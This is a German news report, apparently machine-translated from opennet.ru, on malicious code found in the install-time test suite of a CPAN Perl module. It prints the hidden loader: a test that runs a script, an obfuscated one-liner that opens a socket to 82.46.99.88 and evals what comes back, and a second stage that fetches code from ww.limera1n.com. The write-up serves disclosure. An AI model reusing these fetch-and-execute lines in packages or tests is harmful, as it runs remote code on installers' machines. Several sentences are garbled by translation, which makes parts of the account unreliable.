In einem Perl-Paket, das über das CPAN-Verzeichnis verteilt wird , entwickelt, um CPAN-Module automatisch im laufenden Betrieb zu laden, Schadcode. Der böswillige Einsatz war im Testcode , das seit 2011 versendet.
Bemerkenswert ist, dass Fragen zum Laden von fragwürdigem Code aufkamen im Jahr 2016.
Bei einer böswilligen Aktivität handelt es sich um den Versuch, während der Ausführung einer Testsuite, die bei der Installation des Moduls gestartet wurde, Code von einem Drittanbieterserver (http://r.cx:1/) herunterzuladen und auszuführen. Es wird davon ausgegangen, dass der ursprünglich vom externen Server heruntergeladene Code nicht bösartig war. Jetzt wird die Anfrage jedoch an die Domäne ww.limera1n.com umgeleitet, die ihren Teil des Codes zur Ausführung bereitstellt.
Um den Download in einer Datei zu organisieren Der folgende Code wird verwendet:
mein $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
Der angegebene Code bewirkt, dass das Skript ausgeführt wird , dessen Inhalt auf die Zeile reduziert wird:
use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
Dieses Skript wird geladen Nutzung des Dienstes Code vom externen Host r.cx (Zeichencodes 82.46.99.88 entsprechen dem Text „R.cX“) und führt ihn im eval-Block aus.
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Nach dem Auspacken wird letztendlich Folgendes ausgeführt: :
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1
Das problematische Paket wurde nun aus dem Repository entfernt. (Perl Authors Upload Server) und das Konto des Modulautors ist gesperrt. In diesem Fall bleibt das Modul bestehen im MetaCPAN-Archiv und kann mit einigen Dienstprogrammen wie cpanminus direkt von MetaCPAN aus installiert werden. dass das Paket nicht weit verbreitet wurde.
Interessant zu diskutieren und der Autor des Moduls, der die Information verneinte, dass schädlicher Code eingefügt worden sei, nachdem seine Website „r.cx“ gehackt wurde, und erklärte, dass er nur Spaß hatte und perlobfuscator.com nicht dazu benutzte, etwas zu verbergen, sondern um die Größe zu reduzieren des Codes und vereinfacht dessen Kopieren über die Zwischenablage. Die Wahl des Funktionsnamens „Botstrap“ erklärt sich aus der Tatsache, dass dieses Wort „wie Bot klingt und kürzer als Bootstrap“ ist. Der Autor des Moduls versicherte außerdem, dass die identifizierten Manipulationen keine böswilligen Aktionen ausführen, sondern lediglich das Laden und Ausführen von Code über TCP demonstrieren.
Source: opennet.ru